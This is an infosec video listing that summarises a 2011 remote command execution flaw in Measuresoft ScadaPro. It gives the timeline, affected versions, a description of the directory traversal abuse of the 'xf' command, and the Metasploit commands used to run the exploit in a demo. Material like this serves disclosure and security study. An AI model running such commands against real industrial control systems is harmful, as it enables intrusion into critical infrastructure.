Description: Timeline :
Vulnerability discovered by Luigi Auriemma
Public release of the vulnerability the 2011-09-13
Metasploit PoC provided the 2011-09-16
PoC provided by:
Luigi Auriemma
mr_me
TecR0c
Reference(s) :
EDB-ID-17848
Affected versions :
All Measuresoft ScadaPro before version 4.0.1
Tested on Windows XP Pro SP3 with :
Measuresoft ScadaPro 3.9.15.0 / 3.1.9
Description :
This module allows remote attackers to execute arbitray commands on the affected system by abusing via Directory Traversal attack when using the 'xf' command (execute function). An attacker can execute system() from msvcrt.dll to upload a backdoor and gain remote code execution.
Metasploit demo :
use exploit/windows/scada/scadapro_cmdexe
set RHOST 192.168.178.78
exploit
getuid
sysinfo
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.